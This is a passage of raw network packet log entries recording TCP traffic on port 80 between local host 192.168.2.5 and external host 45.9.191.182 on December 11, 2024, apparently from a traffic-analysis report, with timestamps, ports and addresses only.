                                          Dec 11, 2024 06:01:55.704600096 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.704646111 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.705513000 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.705650091 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.705697060 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.706545115 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.706644058 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.706686974 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.707542896 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.707642078 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.707688093 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.708554029 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.708633900 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.708678961 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.709525108 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.709650993 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.709697962 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.710524082 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.710648060 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.710691929 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.711551905 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.711684942 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.711738110 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.712557077 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.712673903 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.712709904 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.713557959 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.713669062 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.713715076 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.714565992 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.714654922 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.714694977 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.715553999 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.715677023 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.715713978 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.716566086 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.716619015 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.716660976 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.717597008 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.717700005 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.717736006 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.718596935 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.718689919 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.718725920 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.719598055 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.719707966 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.719748020 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.720602989 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.720621109 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.720684052 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.721606016 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.721647978 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.721694946 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.722603083 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.722718000 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.722762108 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.723591089 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.767134905 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.863447905 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.863559008 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.863611937 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.863919020 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.864056110 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.864098072 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.864957094 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.865027905 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.865084887 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.865896940 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.866007090 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.866053104 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.866903067 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.867005110 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.867050886 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.867899895 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.868019104 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.868058920 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.868900061 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.869018078 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.869065046 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.869967937 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.870016098 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.870059013 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.870934010 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.871053934 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.871103048 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.871921062 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.872040033 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.872083902 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.872958899 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.873074055 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.873116970 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.873939037 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.874073982 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.874118090 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.874993086 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.875066042 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.875118017 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.875948906 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.876070976 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.876116037 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.877036095 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.877160072 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.877202988 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.877965927 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.878093004 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.878137112 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.878976107 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.879077911 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.879127979 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.879993916 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.880081892 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.880122900 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.881000042 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.881108999 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.881150961 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.881994963 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.882117033 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.882164001 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.882973909 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.883088112 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.883127928 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.883986950 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.884108067 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.884160995 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.885037899 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.885138035 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.885174990 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.885989904 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.886091948 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.886128902 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.887013912 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.887098074 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.887136936 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.888000965 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.888117075 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.888159037 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.889019966 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.889142036 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.889179945 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.890007973 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.890117884 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.890158892 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.891005993 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.891114950 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.891155005 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.892031908 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.892153978 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.892204046 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.893044949 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.893208981 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.893263102 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.894052029 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.894156933 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.894202948 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.895097971 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.895157099 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.895198107 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.896039963 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.896157980 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.896205902 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.897048950 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.897098064 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.897139072 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.898066044 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.898166895 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.898212910 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.899039984 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.899209023 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.899251938 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.900105953 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.900233984 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.900276899 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.901047945 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.901173115 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.901218891 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.902070999 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.902193069 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.902240992 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.903054953 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.903163910 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.903208017 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.904095888 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.904220104 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.904264927 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.905145884 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.905236006 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.905272961 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.906091928 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.906218052 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.906258106 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.907100916 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.907215118 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.907253981 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.908103943 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.908214092 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.908253908 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.909111023 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.909239054 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.909279108 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.910130978 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.910221100 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.910263062 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.911102057 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.911212921 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.911251068 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.912131071 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.912236929 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.912282944 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.913129091 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.913233042 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.913269043 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.914143085 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.914262056 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.914299011 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.915184021 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.915249109 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.915283918 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:55.916119099 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:55.970251083 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.055316925 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.055367947 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.055430889 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.055545092 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.055599928 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.055644989 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.056566000 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.056687117 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.056732893 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.057550907 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.057773113 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.057827950 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.058577061 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.058698893 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.058743000 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.059576035 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.059748888 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.059797049 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.060586929 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.060683012 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.060728073 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.061611891 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.061733007 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.061772108 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.062607050 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.062643051 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.062686920 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.063632011 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.063707113 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.063750029 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.064620972 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.064742088 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.064785957 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.065619946 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.065722942 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.065768003 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.066606998 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.066711903 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.066760063 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.067611933 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.067730904 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.067775011 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.068649054 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.068697929 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.068742037 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.069622040 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.069803953 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.069852114 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.070635080 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.070750952 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.070795059 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.071625948 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.071744919 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.071788073 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.072637081 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.072741985 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.072796106 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.073620081 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.073744059 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.073792934 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.074651957 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.074780941 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.074830055 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.075675964 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.075836897 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.075882912 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.076672077 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.076778889 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.076826096 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.077661037 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.077774048 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.077816963 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.078675985 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.078875065 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.078917027 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.079679966 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.079818964 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.079863071 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.080687046 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.080795050 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.080837965 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.081686020 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.081801891 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.081847906 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.082684040 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.082796097 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.082839966 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.083678961 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.083786011 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.083831072 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.084690094 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.084824085 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.084870100 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.085716963 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.085839987 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.085894108 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.086730957 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.086867094 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.086911917 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.087703943 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.087836981 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.087878942 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.088716030 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.088839054 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.088885069 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.089709044 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.089886904 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.089931011 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.090722084 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.090841055 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.090884924 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.091728926 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.091834068 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.091877937 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.092736959 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.092849016 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.092894077 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.093739986 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.093869925 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.093923092 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.094784021 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.094885111 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.094929934 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.095777035 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.095916033 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.095957994 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.096807003 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.096932888 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.096988916 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.097790956 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.097907066 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.097946882 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.098823071 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.098937988 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.098989010 CET4971180192.168.2.545.9.191.182
                                          Dec 11, 2024 06:01:56.099756002 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.099924088 CET804971145.9.191.182192.168.2.5
                                          Dec 11, 2024 06:01:56.099972010 CET4971180192.168.2.545.9.191.182
